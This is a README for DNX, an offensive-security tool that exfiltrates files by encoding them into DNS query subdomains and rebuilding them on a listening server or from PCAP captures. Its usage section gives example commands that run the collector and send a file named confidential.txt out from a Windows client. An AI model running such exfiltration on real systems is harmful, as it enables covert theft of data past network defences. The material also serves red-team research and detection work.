DNX is a DNS-based data exfiltration tool developed for offensive security research. It demonstrates how file contents can be encoded, transmitted through DNS queries, and reliably reconstructed on the receiving side.
The tool consists of a Python-based server component responsible for payload generation and DNS query collection, along with OS-specific client payloads that transmit data using controlled subdomains. DNX also includes an offline PCAP parsing utility to recover exfiltrated data from captured network traffic.
On startup, dnx.py generates an OS-specific client payload based on the target specified via the -t parameter (Windows or Linux). Once the payload is generated, DNX starts a lightweight DNS server that listens for incoming queries containing the user-defined domain provided through the -d parameter.
As DNS requests are received, the server extracts the subdomain portion of each matching query and stores the encoded data fragments. After transmission completes, the collected data is concatenated, Base64-decoded, and reconstructed into the original file, which is then written locally.
On the client side, the payload operates using native system utilities only. It reads the user-specified file, encodes its contents using Base64, splits the encoded data into DNS-safe chunks, and transmits each chunk by issuing successive DNS queries where the chunk is embedded as a subdomain. This process continues until the entire file has been exfiltrated.
In addition to live collection, DNX includes a standalone utility capable of parsing captured DNS traffic from a .pcap file. This utility extracts the embedded subdomain data and reconstructs the original file offline, enabling post-capture analysis without access to the running server.
- OS-specific payload generation for Windows and Linux targets
- Lightweight and easy to use, with minimal setup requirements
- Live DNS server for capturing and processing exfiltration traffic
- Subdomain-based data transmission using standard DNS queries
- Base64 encoding with chunking to ensure DNS label compatibility
- Automatic reconstruction and recovery of exfiltrated files
- Offline file reconstruction from captured DNS traffic (
.pcap) - Reliable reconstruction of both text and binary data (e.g., images)
- Payloads designed to operate using native system utilities only
DNX is operated from the server side and does not require ownership of the target domain. The tool observes DNS queries containing a user-specified domain string, which is used as a matching filter during data collection.
The primary entry point is dnx.py, which handles both client payload generation and the DNS listener. The operator specifies the domain to be used in DNS queries, the destination DNS server, and the target operating system via command-line options. Chunk size can also be adjusted to control how much encoded data is embedded in each query.
Once started, DNX listens for incoming DNS requests matching the configured domain and automatically extracts and reconstructs the transmitted data.
The generated payload is executed on the target system and requires only the path to the file intended for exfiltration. It performs encoding, chunking, and transmission using native system utilities, without introducing additional dependencies.
Captured DNS traffic can also be analyzed offline using the included parsepcap.sh utility to reconstruct exfiltrated files without access to the live server.
server side :
./dnx.py [-h] -d DOMAIN -s SERVER -t {windows,linux} [-c CHUNK]example :
./dnx.py -t windows -d example.com -s 192.168.135.40client side :
.\win.ps1 <file_to_exfiltrate>example :
.\win.ps1 C:\users\admin\Documents\confidential.txtoffline parsing :
./parsepcap.sh <PATH-TO-PCAP-FILE> <DOMIAN-NAME>example :
./parsepcap.sh out.pcap example.com
Click the image above to watch the full demo on YouTube.
DNX is provided strictly for educational, research, and authorized security testing purposes. It is intended to demonstrate DNS-based data exfiltration techniques.
Use of this tool on systems or networks without explicit permission is prohibited. The author assumes no responsibility for misuse or damage resulting from the use of this software. Users are solely responsible for ensuring that their activities comply with applicable laws, policies, and ethical guidelines.